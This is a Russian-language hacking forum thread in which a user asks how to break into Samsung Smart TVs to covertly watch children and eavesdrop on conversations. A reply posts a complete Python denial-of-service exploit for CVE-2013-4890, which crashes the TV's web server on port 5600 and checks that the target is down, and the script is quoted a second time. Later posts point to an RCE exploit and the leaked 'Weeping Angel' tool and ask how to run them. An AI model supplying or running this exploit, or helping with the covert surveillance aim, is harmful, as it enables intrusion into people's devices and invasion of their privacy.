Действительно ли возможен взлом телевизоров samsung smart tv

thunder

thunder

Green Team
08.12.2016
219
26
Возможен ли взлом телевизоров samsung smart tv ( с целью видеонаблюдения за детьми , прослушка разговора ) ? Какие инструменты актуальны для этой цели ?
 
ghostphisher

ghostphisher

местный
Grey Team
07.12.2016
2 605
3 433
статья про смарт тв от 15 года, там по ссылкам можно наковырять и за 14-13 год.

Ссылка скрыта от гостей
 
thunder

thunder

Green Team
08.12.2016
219
26
ghostphisher : Статья это хорошо :) Вот только я не увидел никакой конкретики ( гайд взлома , инструменты ).
 
Axon

Axon

Green Team
04.01.2017
70
77
На днях, на wikileaks как раз была опубликована коллекция инструментов для взлома, которые принадлежали ЦРУ, в том числе там есть и упоминание о эксплойте для тех самых телевизоров Samsung, эксплойт называется weeping angel.
 
ghostphisher

ghostphisher

местный
Grey Team
07.12.2016
2 605
3 433
На эксплоит дб лежат с 15 года
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
[doublepost=1489179831,1489125160][/doublepost]

Под спойлер спрятал код для DoS ящиков Самсы

#!/usr/bin/python
#
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT -
Ссылка скрыта от гостей

# module by: pedr0 ubuntu [ r00t-3xp10it ]
#
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage:
Ссылка скрыта от гостей

# P.O.C =>
#
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long
# HTTP GET request As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
#
###



# ----------------------------
# import dependencies
# ----------------------------
import httplib
import time
import sys
import os
import time



# ----------------------------
# script colorize output
# ----------------------------
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
WHITE = '\033[0m'
ORANGE = '\033[33m'



# ----------------------------
# exploit banner
# ----------------------------
print BLUE+"**************************************************************"
print WHITE+" Author: Malik Mesellem - @MME_IT -
Ссылка скрыта от гостей
"
print WHITE+" Exploit: Denial of Service (DoS) attack"
print WHITE+" module by: pedr0 ubuntu aka r00t-3xp10it"
print ""
print WHITE+" Description:"
print WHITE+" The web server (DMCRUIS/0.1) on port TCP/5600"
print WHITE+" is crashing by sending a long HTTP GET request."
print WHITE+" Tested successfully on my Samsung PS50C7700 plasma TV :)"
print BLUE+"**************************************************************"




# ----------------------------
# Sends the payload
# ----------------------------
print ""
print BLUE+"[*]"+GREEN+" press ctrl+z to stop"
print BLUE+"[*]"+WHITE+" Sending the malicious payload..."
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# ----------------------------
# Checks the response
# ----------------------------
print BLUE+"[*]"+WHITE+" Checking the status..."
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print BLUE+"[*]"+GREEN+" (Success):"+RED+" the target seems to be down !!!"
print WHITE+""
time.sleep(10)
 
thunder

thunder

Green Team
08.12.2016
219
26
ghostphisher сказал(а):
На эксплоит дб лежат с 15 года
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
[doublepost=1489179831,1489125160][/doublepost]

Под спойлер спрятал код для DoS ящиков Самсы

#!/usr/bin/python
#
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT -
Ссылка скрыта от гостей

# module by: pedr0 ubuntu [ r00t-3xp10it ]
#
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage:
Ссылка скрыта от гостей

# P.O.C =>
#
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long
# HTTP GET request As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
#
###



# ----------------------------
# import dependencies
# ----------------------------
import httplib
import time
import sys
import os
import time



# ----------------------------
# script colorize output
# ----------------------------
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
WHITE = '\033[0m'
ORANGE = '\033[33m'



# ----------------------------
# exploit banner
# ----------------------------
print BLUE+"**************************************************************"
print WHITE+" Author: Malik Mesellem - @MME_IT -
Ссылка скрыта от гостей
"
print WHITE+" Exploit: Denial of Service (DoS) attack"
print WHITE+" module by: pedr0 ubuntu aka r00t-3xp10it"
print ""
print WHITE+" Description:"
print WHITE+" The web server (DMCRUIS/0.1) on port TCP/5600"
print WHITE+" is crashing by sending a long HTTP GET request."
print WHITE+" Tested successfully on my Samsung PS50C7700 plasma TV :)"
print BLUE+"**************************************************************"




# ----------------------------
# Sends the payload
# ----------------------------
print ""
print BLUE+""+GREEN+" press ctrl+z to stop"
print BLUE+""+WHITE+" Sending the malicious payload..."
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# ----------------------------
# Checks the response
# ----------------------------
print BLUE+""+WHITE+" Checking the status..."
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print BLUE+""+GREEN+" (Success):"+RED+" the target seems to be down !!!"
print WHITE+""
time.sleep(10)
Нажмите, чтобы раскрыть...
Спасибо за конкретику . Как фремворк поддерживает данный эксплоит (в какой фремворк его можно засунуть ) ? Там ,что то написано про поддержку windows 7 ..
[doublepost=1489198730][/doublepost]
Axon сказал(а):
На днях, на wikileaks как раз была опубликована коллекция инструментов для взлома, которые принадлежали ЦРУ, в том числе там есть и упоминание о эксплойте для тех самых телевизоров Samsung, эксплойт называется weeping angel.
Нажмите, чтобы раскрыть...
Документы по weeping angel нашёл
Ссылка скрыта от гостей
, а вот само по пока нет. По мимо документов , программы сливались ?
 
ghostphisher

ghostphisher

местный
Grey Team
07.12.2016
2 605
3 433
Инструменты на паблик еще не скоро попадут. Хотя про сливы оных я не увидел новостей. И просить тут тоже не стоит.
 
thunder

thunder

Green Team
08.12.2016
219
26
ghostphisher: А, что по поводу эксплоита Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution..как его реализовать - в какой фрейморк его можно установить ?
 
ghostphisher

ghostphisher

местный
Grey Team
07.12.2016
2 605
3 433
thunder сказал(а):
[ А, что по поводу эксплоита Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution..как его реализовать - в какой фрейморк его можно установить ?
Нажмите, чтобы раскрыть...

Там же в шапке кода написано на чем код, соотвественно его надо запускать на этом же. Зачем фрейм, если он так работать может..?
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Похожие темы

I
нужна помощь в пентестинге внутри хостинга
Ответы
3
Просмотры
591
Этичный хакинг и тестирование на проникновение
ErrNick
ErrNick
User17
  • Статья
Статья Гуляем по сети. Анализ почты
Ответы
0
Просмотры
2 тыс.
Этичный хакинг и тестирование на проникновение
User17
User17
Strife
  • Статья
Статья Новостной дайджест по ИБ/IT за 01.05-09.05
Ответы
4
Просмотры
1 тыс.
Свободное общение
Strife
Strife
M
  • Вопрос
Пентест не актуален или я ччто-то не понимаю?
Ответы
12
Просмотры
859
Вопрос - Ответ
WithoutIrony
W
Верх Низ